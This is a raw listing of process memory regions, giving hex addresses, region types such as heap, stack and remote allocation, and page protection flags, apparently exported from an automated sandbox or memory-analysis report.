5E70000
trusted library allocation
page read and write
20EA3B5F000
heap
page read and write
82103FB000
stack
page read and write
20532741000
trusted library allocation
page read and write
3A78000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
1F23000
trusted library allocation
page read and write
1210000
heap
page read and write
20EA3B11000
heap
page read and write
19C000
stack
page read and write
870000
heap
page read and write
5E60000
trusted library allocation
page execute and read and write
850000
heap
page read and write
B0F000
unkown
page read and write
7150000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
5F30000
trusted library allocation
page read and write
20EA3BDE000
heap
page read and write
760000
unkown
page readonly
76F0000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
20EA3B47000
heap
page read and write
62F0000
trusted library allocation
page read and write
9EF000
stack
page read and write
20EA3BFB000
heap
page read and write
72F0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
20EA4414000
heap
page read and write
6BD1000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
6290000
trusted library allocation
page read and write
20EA3B26000
heap
page read and write
62B0000
trusted library allocation
page read and write
20EA3BD5000
heap
page read and write
20EA435A000
heap
page read and write
20EA3B8F000
heap
page read and write
7330000
trusted library allocation
page read and write
430000
heap
page read and write
20EA3A8C000
heap
page read and write
62C0000
trusted library allocation
page read and write
5A0000
unkown
page read and write
7200000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
6B72000
trusted library allocation
page read and write
6A76000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
7FF9A5B89000
trusted library allocation
page read and write
937000
heap
page read and write
101E000
stack
page read and write
20EA3AD0000
heap
page read and write
62A0000
trusted library allocation
page read and write
20530BC0000
heap
page read and write
63C0000
trusted library allocation
page read and write
5E0F000
stack
page read and write
63B0000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
20EA4411000
heap
page read and write
7FF9A5C80000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
310A000
heap
page read and write
76C0000
trusted library allocation
page read and write
A60000
heap
page read and write
20EA3AE8000
heap
page read and write
71B0000
trusted library allocation
page read and write
20EA4427000
heap
page read and write
72B0000
trusted library allocation
page read and write
DCE000
stack
page read and write
6A70000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
20532C70000
trusted library allocation
page read and write
3110000
heap
page read and write
3C01000
trusted library allocation
page read and write
63C6000
trusted library allocation
page read and write
E00000
heap
page read and write
63C0000
trusted library allocation
page read and write
20EA3ABC000
heap
page read and write
334F000
stack
page read and write
6310000
trusted library allocation
page read and write
20533C77000
trusted library allocation
page read and write
5F00000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
20EA434E000
heap
page read and write
20542CFC000
trusted library allocation
page read and write
20530C8C000
heap
page read and write
70E0000
trusted library allocation
page read and write
530000
heap
page read and write
75A0000
trusted library allocation
page read and write
6A6C000
unkown
page read and write
5F40000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
C80000
unkown
page readonly
30EE000
heap
page read and write
3F0000
remote allocation
page read and write
5F50000
trusted library allocation
page read and write
20EA3B00000
heap
page read and write
20EA3A29000
heap
page read and write
560000
heap
page read and write
6A90000
trusted library allocation
page read and write
103C000
stack
page read and write
2054ACA3000
heap
page read and write
7140000
trusted library allocation
page read and write
7725000
trusted library allocation
page read and write
3E50000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
400000
unkown
page readonly
7690000
trusted library allocation
page read and write
1040000
remote allocation
page read and write
72B0000
trusted library allocation
page read and write
20EA3BD9000
heap
page read and write
B2C2000
heap
page read and write
90E000
stack
page read and write
6A60000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
2054AEC0000
heap
page read and write
74C000
stack
page read and write
B305000
heap
page read and write
20EA3BBA000
heap
page read and write
7330000
trusted library allocation
page read and write
20EA3B7B000
heap
page read and write
6A75000
trusted library allocation
page read and write
20533D08000
trusted library allocation
page read and write
20EA3BC0000
heap
page read and write
7300000
trusted library allocation
page read and write
70D000
stack
page read and write
6C19000
trusted library allocation
page read and write
7425000
trusted library allocation
page read and write
20EA3B4F000
heap
page read and write
20EA3B8E000
heap
page read and write
63B0000
unkown
page read and write
20532710000
heap
page execute and read and write
1DF8CB4C000
heap
page read and write
20530BF0000
heap
page read and write
7300000
trusted library allocation
page read and write
20532700000
heap
page execute and read and write
7490000
trusted library allocation
page read and write
1AC000
stack
page read and write
5EE6000
trusted library allocation
page read and write
20EA3BDD000
heap
page read and write
687000
heap
page read and write
6A60000
trusted library allocation
page read and write
3C4D000
trusted library allocation
page read and write
7D0000
remote allocation
page read and write
5EE0000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page execute and read and write
7710000
trusted library allocation
page read and write
6BCD000
trusted library allocation
page read and write
F9B7DFC000
stack
page read and write
6BE0000
trusted library allocation
page read and write
5F50000
trusted library allocation
page read and write
63C5000
unkown
page read and write
5F0000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
6A60000
unkown
page read and write
63B0000
trusted library allocation
page read and write
34DB000
heap
page read and write
5F40000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
201A000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
6A66000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
750000
unkown
page readonly
20533893000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
4AF4000
trusted library allocation
page read and write
3C2D000
trusted library allocation
page read and write
10B53000
direct allocation
page readonly
72F0000
trusted library allocation
page read and write
100C000
stack
page read and write
20EA4372000
heap
page read and write
62E0000
trusted library allocation
page read and write
20532E93000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
66E000
stack
page read and write
20530C30000
heap
page read and write
62E0000
trusted library allocation
page read and write
20EA3A9C000
heap
page read and write
7210000
trusted library allocation
page read and write
401000
unkown
page execute read
63C0000
trusted library allocation
page read and write
7120000
trusted library allocation
page execute and read and write
20EA3A8F000
heap
page read and write
B2B4000
heap
page read and write
7170000
trusted library allocation
page read and write
3CCB000
trusted library allocation
page read and write
1030000
remote allocation
page read and write
20EA3A78000
heap
page read and write
62F0000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6280000
trusted library allocation
page execute and read and write
2054B0C0000
trusted library allocation
page read and write
CFBE000
stack
page read and write
5F30000
trusted library allocation
page read and write
343F000
stack
page read and write
EDCA0FE000
stack
page read and write
20EA3BCF000
heap
page read and write
1498000
unkown
page write copy
62A0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
3CFE000
trusted library allocation
page read and write
63C0000
unkown
page read and write
6A70000
trusted library allocation
page read and write
7540000
unkown
page read and write
7FE000
stack
page read and write
11D000
stack
page read and write
72B0000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
5F24000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
9BC000
stack
page read and write
63B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7B0000
heap
page read and write
7156000
trusted library allocation
page read and write
2054B0D0000
trusted library allocation
page read and write
20EA3BB2000
heap
page read and write
6A90000
trusted library allocation
page read and write
17285AA0000
remote allocation
page read and write
6BD6000
trusted library allocation
page read and write
510000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
7FF9A5B32000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
7FF9A5BE7000
trusted library allocation
page read and write
D70000
heap
page read and write
20EA3BB0000
heap
page read and write
63C0000
trusted library allocation
page read and write
D40000
unkown
page readonly
5EE0000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
20EA3AC1000
heap
page read and write
3DA0000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
32B0000
heap
page read and write
20EA3A13000
heap
page read and write
6A90000
trusted library allocation
page read and write
2054AD4E000
heap
page read and write
20EA4322000
heap
page read and write
770000
unkown
page read and write
6A68000
trusted library allocation
page read and write
A7A000
heap
page read and write
7136000
trusted library allocation
page read and write
20EA3A5E000
heap
page read and write
7574000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
20EA3A72000
heap
page read and write
20EA3B55000
heap
page read and write
63C0000
trusted library allocation
page read and write
62F7000
trusted library allocation
page read and write
7FF9A5A00000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
2FA0000
heap
page read and write
8BE000
stack
page read and write
6A75000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
2054B0D0000
trusted library allocation
page read and write
20EA3A91000
heap
page read and write
B164000
unkown
page readonly
20EA3B2D000
heap
page read and write
7170000
unkown
page read and write
EB0000
heap
page read and write
62F0000
trusted library allocation
page read and write
E8E000
stack
page read and write
2FEE000
stack
page read and write
20EA434F000
heap
page read and write
B364000
heap
page read and write
7300000
trusted library allocation
page read and write
800000
remote allocation
page read and write
960000
heap
page read and write
7130000
trusted library allocation
page read and write
3D4A000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
180000
remote allocation
page read and write
20EA4350000
heap
page read and write
7FF9A5B04000
trusted library allocation
page read and write
20EA440F000
heap
page read and write
6A90000
trusted library allocation
page read and write
17285AA0000
remote allocation
page read and write
3E24000
trusted library allocation
page read and write
10B53000
direct allocation
page readonly
20EA3BD7000
heap
page read and write
2054AD85000
heap
page read and write
63B0000
trusted library allocation
page read and write
C60000
heap
page read and write
6A66000
trusted library allocation
page read and write
31AE000
stack
page read and write
70E0000
trusted library allocation
page read and write
3C0D000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
30CC000
heap
page read and write
D78000
unkown
page write copy
5F40000
trusted library allocation
page read and write
5F50000
trusted library allocation
page read and write
30BE000
stack
page read and write
20EA3A53000
heap
page read and write
2054B0C0000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
3A91000
trusted library allocation
page read and write
303E000
stack
page read and write
6A90000
trusted library allocation
page read and write
54C000
stack
page read and write
C3D000
stack
page read and write
3EAF000
trusted library allocation
page read and write
CAC000
stack
page read and write
6280000
trusted library allocation
page read and write
20EA4328000
heap
page read and write
6B20000
trusted library allocation
page execute and read and write
9E0000
remote allocation
page read and write
6A70000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
423000
unkown
page read and write
739E000
trusted library allocation
page read and write
B326000
heap
page read and write
7FF9A5B70000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6AB5000
trusted library allocation
page read and write
940000
remote allocation
page read and write
20EA3B65000
heap
page read and write
62E0000
trusted library allocation
page read and write
C81000
unkown
page execute read
2C814635000
heap
page read and write
6A60000
trusted library allocation
page read and write
2054B0C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
63B7000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
5F00000
trusted library allocation
page read and write
62B1000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
47E000
stack
page read and write
7AC000
stack
page read and write
5F25000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
FCD000
stack
page read and write
72F0000
trusted library allocation
page read and write
43E000
stack
page read and write
63C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
C37FEFE000
stack
page read and write
6A60000
trusted library allocation
page read and write
20EA3AA2000
heap
page read and write
750000
heap
page read and write
5A0000
unkown
page read and write
2054B0C1000
trusted library allocation
page read and write
AC0000
heap
page read and write
30D5000
heap
page read and write
5F00000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
6BFD000
trusted library allocation
page read and write
6276000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
20EA3B51000
heap
page read and write
20EA3BF5000
heap
page read and write
7250000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
7575000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
6AC000
stack
page read and write
6D0000
remote allocation
page read and write
7420000
trusted library allocation
page read and write
6A66000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7FF9A5B50000
trusted library allocation
page read and write
6A89000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
30000
heap
page read and write
62F0000
trusted library allocation
page read and write
7370000
trusted library allocation
page read and write
33F0000
heap
page read and write
6A70000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
20533952000
trusted library allocation
page read and write
3207000
heap
page read and write
CD0000
remote allocation
page read and write
12D0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
2FAE000
stack
page read and write
72EB000
trusted library allocation
page read and write
71C0000
trusted library allocation
page read and write
590000
unkown
page readonly
6270000
trusted library allocation
page read and write
94E000
stack
page read and write
63B0000
trusted library allocation
page read and write
20EA4313000
heap
page read and write
5F21000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
C1E000
stack
page read and write
63C0000
trusted library allocation
page read and write
20EA3B33000
heap
page read and write
670000
heap
page read and write
5F3C000
trusted library allocation
page read and write
790000
trusted library allocation
page read and write
2054AD42000
heap
page read and write
E20000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
399F000
stack
page read and write
5F40000
trusted library allocation
page read and write
8F0000
heap
page read and write
5EE0000
trusted library allocation
page read and write
7430000
trusted library allocation
page read and write
AD7000
heap
page read and write
2054AF20000
heap
page read and write
7175000
trusted library allocation
page read and write
B33E000
heap
page read and write
10B4F000
direct allocation
page read and write
3C94000
trusted library allocation
page read and write
570000
remote allocation
page read and write
20EA4202000
heap
page read and write
6A70000
trusted library allocation
page read and write
20EA3B1E000
heap
page read and write
63C0000
trusted library allocation
page read and write
5F30000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
AB84000
stack
page read and write
3E64000
trusted library allocation
page read and write
5A0000
unkown
page read and write
7480000
trusted library allocation
page read and write
B33E000
heap
page read and write
7300000
trusted library allocation
page read and write
FE0000
remote allocation
page read and write
63C0000
trusted library allocation
page read and write
63B5000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
20533964000
trusted library allocation
page read and write
7250000
trusted library allocation
page read and write
D70000
heap
page read and write
3507000
heap
page read and write
72B0000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
DAC2000
trusted library allocation
page read and write
7FF9A596C000
trusted library allocation
page read and write
20EA4419000
heap
page read and write
62E0000
trusted library allocation
page read and write
F4E000
stack
page read and write
7310000
trusted library allocation
page read and write
980000
heap
page read and write
62B0000
trusted library allocation
page read and write
20542C91000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
70DC000
stack
page read and write
7354000
trusted library allocation
page read and write
324E000
stack
page read and write
750000
unkown
page readonly
20EA3BC8000
heap
page read and write
20532C60000
trusted library allocation
page read and write
1496000
unkown
page read and write
63A4000
trusted library allocation
page read and write
7380000
trusted library allocation
page read and write
520000
trusted library allocation
page read and write
D439000
stack
page read and write
3480000
heap
page read and write
3200000
heap
page read and write
72E0000
trusted library allocation
page read and write
3E17000
trusted library allocation
page read and write
9BE000
stack
page read and write
5E60000
trusted library allocation
page read and write
17285213000
heap
page read and write
7540000
trusted library allocation
page read and write
6151000
heap
page read and write
3C35000
trusted library allocation
page read and write
6B00000
trusted library allocation
page read and write
6A95000
trusted library allocation
page read and write
427000
unkown
page readonly
20EA3B2C000
heap
page read and write
20EA3AEF000
heap
page read and write
D4E000
stack
page read and write
62F0000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
3139000
heap
page read and write
62C0000
trusted library allocation
page read and write
9BE000
stack
page read and write
7FF9A5CA0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
31BE000
stack
page read and write
3A1E000
stack
page read and write
F9B7EFE000
stack
page read and write
7300000
trusted library allocation
page read and write
9F0000
unkown
page readonly
AB0000
heap
page read and write
5EE5000
trusted library allocation
page read and write
6A40000
trusted library allocation
page read and write
2EB0000
unkown
page readonly
620000
heap
page read and write
63C0000
trusted library allocation
page read and write
B31B000
heap
page read and write
63C0000
trusted library allocation
page read and write
CC9E000
stack
page read and write
820FE7E000
stack
page read and write
74E0000
trusted library allocation
page read and write
3417000
heap
page read and write
800000
remote allocation
page read and write
908000
heap
page read and write
6280000
trusted library allocation
page read and write
20EA4331000
heap
page read and write
2FF0000
unkown
page readonly
3D13000
trusted library allocation
page read and write
5F20000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
3C8C000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
180000
remote allocation
page read and write
7310000
trusted library allocation
page read and write
20530FDE000
heap
page read and write
3310000
heap
page read and write
2FF0000
trusted library allocation
page read and write
2FE0000
unkown
page readonly
63C9000
trusted library allocation
page read and write
137E000
stack
page read and write
7520000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
6BEA000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
5EE6000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
AADD000
stack
page read and write
7310000
trusted library allocation
page read and write
10B0000
remote allocation
page read and write
6270000
trusted library allocation
page read and write
20EA3B35000
heap
page read and write
7340000
trusted library allocation
page read and write
534000
heap
page read and write
7500000
trusted library allocation
page read and write
1070000
heap
page read and write
7190000
trusted library allocation
page read and write
10CA000
heap
page read and write
72B0000
trusted library allocation
page read and write
7FF9A5963000
trusted library allocation
page read and write
20EA3BD1000
heap
page read and write
62F0000
trusted library allocation
page read and write
1DF8CA20000
remote allocation
page read and write
CF0000
heap
page read and write
6BC1000
trusted library allocation
page read and write
20EA3ADC000
heap
page read and write
20EA3B17000
heap
page read and write
7163000
trusted library allocation
page read and write
EA0000
trusted library allocation
page read and write
20532780000
heap
page read and write
6A68000
trusted library allocation
page read and write
7630000
trusted library allocation
page read and write
2020000
trusted library allocation
page read and write
1DF8CB48000
heap
page read and write
B326000
heap
page read and write
6A60000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
10DD000
stack
page read and write
1DF8CD90000
heap
page read and write
20EA3A9F000
heap
page read and write
400000
unkown
page readonly
20EA3B72000
heap
page read and write
7D0000
remote allocation
page read and write
72F0000
trusted library allocation
page read and write
3A60000
trusted library allocation
page read and write
1030000
heap
page read and write
7410000
trusted library allocation
page read and write
7560000
unkown
page read and write
1F0000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
900000
heap
page read and write
D4E000
stack
page read and write
7738000
trusted library allocation
page read and write
1DBFEE20000
heap
page read and write
3060000
trusted library allocation
page read and write
7180000
unkown
page read and write
6A60000
trusted library allocation
page read and write
20EA3A3E000
heap
page read and write
6270000
trusted library allocation
page read and write
B10000
trusted library allocation
page read and write
3C40000
trusted library allocation
page read and write
B374000
heap
page read and write
20EA3B20000
heap
page read and write
5EE0000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6AC0000
trusted library allocation
page read and write
2054B0D0000
trusted library allocation
page read and write
F60000
heap
page read and write
63B0000
trusted library allocation
page read and write
1728523B000
heap
page read and write
5EE0000
trusted library allocation
page read and write
2E60000
heap
page read and write
31BE000
stack
page read and write
63C0000
trusted library allocation
page read and write
37B0000
heap
page read and write
950000
trusted library allocation
page read and write
41B000
unkown
page readonly
6A60000
trusted library allocation
page read and write
20530FD0000
heap
page read and write
62C0000
trusted library allocation
page read and write
20EA3A94000
heap
page read and write
71C0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
20EA4322000
heap
page read and write
75F0000
trusted library allocation
page read and write
5F10000
trusted library allocation
page read and write
6A76000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
30FF000
stack
page read and write
6A90000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
E50000
trusted library allocation
page read and write
63B0000
unkown
page read and write
62E0000
trusted library allocation
page read and write
CEBF000
stack
page read and write
7563000
trusted library allocation
page read and write
6A65000
unkown
page read and write
63F0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7100000
trusted library allocation
page execute and read and write
63C0000
trusted library allocation
page read and write
20533C6E000
trusted library allocation
page read and write
D3E000
stack
page read and write
790000
heap
page read and write
DD57000
trusted library allocation
page read and write
427000
unkown
page readonly
7330000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
1DBFD500000
heap
page read and write
6A67000
unkown
page read and write
6A60000
unkown
page read and write
AA44000
unkown
page readonly
3CD4000
trusted library allocation
page read and write
5EE5000
trusted library allocation
page read and write
B2B3000
heap
page read and write
20530B30000
heap
page read and write
600000
heap
page read and write
6A90000
trusted library allocation
page read and write
837000
heap
page read and write
7300000
trusted library allocation
page read and write
32FC000
heap
page read and write
5E70000
trusted library allocation
page read and write
49D000
stack
page read and write
20533C99000
trusted library allocation
page read and write
1070000
trusted library allocation
page read and write
20EA435C000
heap
page read and write
63B8000
trusted library allocation
page read and write
6A60000
unkown
page read and write
6A90000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6BD0000
trusted library allocation
page read and write
B2CB000
heap
page read and write
281F000
stack
page read and write
71E0000
trusted library allocation
page read and write
55A65EB000
stack
page read and write
7300000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
75E000
stack
page read and write
6A77000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
5EF0000
trusted library allocation
page read and write
7240000
trusted library allocation
page read and write
27D0000
heap
page read and write
5EF0000
trusted library allocation
page read and write
6151000
heap
page read and write
32FA000
heap
page read and write
20EA3AA6000
heap
page read and write
7FF9A595D000
trusted library allocation
page execute and read and write
7340000
trusted library allocation
page execute and read and write
3E98000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
2FF0000
unkown
page readonly
7100000
trusted library allocation
page read and write
20EA3AF9000
heap
page read and write
20EA4362000
heap
page read and write
20532C91000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20EA3B61000
heap
page read and write
20EA3A6E000
heap
page read and write
7130000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
97E000
stack
page read and write
700000
heap
page read and write
7150000
trusted library allocation
page read and write
31C0000
heap
page read and write
63C0000
trusted library allocation
page read and write
AA44000
unkown
page readonly
72D0000
trusted library allocation
page read and write
B31B000
heap
page read and write
BA50000
heap
page read and write
DB0000
heap
page read and write
20EA3A77000
heap
page read and write
7300000
trusted library allocation
page read and write
7470000
trusted library allocation
page read and write
7FF9A5B20000
trusted library allocation
page execute and read and write
6270000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
20EA3B8C000
heap
page read and write
62B0000
trusted library allocation
page read and write
3F4D000
trusted library allocation
page read and write
47D000
stack
page read and write
A7E000
stack
page read and write
8FF000
stack
page read and write
20EA3BCC000
heap
page read and write
4FE000
stack
page read and write
7360000
trusted library allocation
page read and write
AFB0000
heap
page read and write
20EA3A62000
heap
page read and write
72F0000
trusted library allocation
page read and write
20EA3A7F000
heap
page read and write
97D000
stack
page read and write
567000
heap
page read and write
6A60000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
DF0000
remote allocation
page read and write
CC5E000
stack
page read and write
71C0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
3C16000
trusted library allocation
page read and write
62C2000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
7729000
trusted library allocation
page read and write
94E000
stack
page read and write
AA70000
heap
page read and write
7390000
trusted library allocation
page read and write
20EA4376000
heap
page read and write
D8E000
stack
page read and write
63B0000
trusted library allocation
page read and write
DAC1000
trusted library allocation
page read and write
20EA3BF8000
heap
page read and write
6270000
trusted library allocation
page read and write
AFBA000
heap
page read and write
2054B0C0000
trusted library allocation
page read and write
B1AF000
stack
page read and write
63E0000
trusted library allocation
page read and write
5EE5000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20EA3AC9000
heap
page read and write
3F95000
trusted library allocation
page read and write
DA7000
heap
page read and write
7175000
unkown
page read and write
20EA3B70000
heap
page read and write
55A6BFE000
stack
page read and write
5F0F000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
5F20000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
20EA4365000
heap
page read and write
6A90000
trusted library allocation
page read and write
20EA3A95000
heap
page read and write
7670000
trusted library allocation
page read and write
D80000
trusted library allocation
page read and write
3F2E000
trusted library allocation
page read and write
20EA3B07000
heap
page read and write
347E000
stack
page read and write
DF0000
trusted library allocation
page read and write
FBC000
stack
page read and write
EDCA17E000
stack
page read and write
76B0000
trusted library allocation
page read and write
EB7000
heap
page read and write
1F0000
trusted library allocation
page read and write
63A0000
trusted library allocation
page read and write
1017A000
direct allocation
page read and write
570000
remote allocation
page read and write
10001000
direct allocation
page execute read
7700000
trusted library allocation
page read and write
E07000
heap
page read and write
75C0000
trusted library allocation
page read and write
6A7E000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
20530C38000
heap
page read and write
2770000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
DCC000
stack
page read and write
EDCA53E000
stack
page read and write
6B86000
trusted library allocation
page read and write
2054B0C0000
trusted library allocation
page read and write
3EC3000
trusted library allocation
page read and write
10D0000
trusted library allocation
page read and write
3CF3000
trusted library allocation
page read and write
DAC1000
trusted library allocation
page read and write
20EA440A000
heap
page read and write
20EA3ADF000
heap
page read and write
2054B0C0000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
20EA3AE7000
heap
page read and write
500000
remote allocation
page read and write
BDE000
stack
page read and write
7170000
unkown
page read and write
72E0000
trusted library allocation
page read and write
63F0000
trusted library allocation
page read and write
2054B0C0000
trusted library allocation
page read and write
20EA3ADA000
heap
page read and write
3280000
unkown
page read and write
20EA3AA4000
heap
page read and write
6A70000
unkown
page read and write
2C815002000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
1040000
remote allocation
page read and write
5F36000
trusted library allocation
page read and write
6B1E000
stack
page read and write
6A65000
trusted library allocation
page read and write
3EA3000
trusted library allocation
page read and write
2054B0C0000
trusted library allocation
page read and write
31BE000
stack
page read and write
5F05000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
2F3E000
unkown
page read and write
63C0000
trusted library allocation
page read and write
20EA3AD1000
heap
page read and write
20EA4417000
heap
page read and write
7FF9A5960000
trusted library allocation
page read and write
3D6A000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
62F0000
trusted library allocation
page read and write
7100000
trusted library allocation
page read and write
72D5000
trusted library allocation
page read and write
20EA3BEF000
heap
page read and write
20EA4408000
heap
page read and write
7FF9A5A0C000
trusted library allocation
page execute and read and write
20EA3AC2000
heap
page read and write
B20000
heap
page read and write
72B0000
trusted library allocation
page read and write
2FB9000
trusted library allocation
page read and write
E4F000
stack
page read and write
2033000
trusted library allocation
page read and write
38D000
stack
page read and write
63C0000
trusted library allocation
page read and write
C37FE7E000
stack
page read and write
72B0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
10C9000
heap
page read and write
680000
heap
page read and write
63C0000
trusted library allocation
page read and write
1F24000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
422000
unkown
page write copy
5BF000
stack
page read and write
7310000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
20EA3B54000
heap
page read and write
2054AC90000
heap
page read and write
87F000
stack
page read and write
27BE000
stack
page read and write
6280000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
71C0000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
B280000
heap
page read and write
63B0000
trusted library allocation
page read and write
A20000
remote allocation
page read and write
D47C000
stack
page read and write
63C0000
trusted library allocation
page read and write
7164000
trusted library allocation
page read and write
3C75000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20542CF0000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
AFE8000
heap
page read and write
20EA3B50000
heap
page read and write
72B0000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
D57D000
stack
page read and write
63C0000
trusted library allocation
page read and write
63F0000
trusted library allocation
page read and write
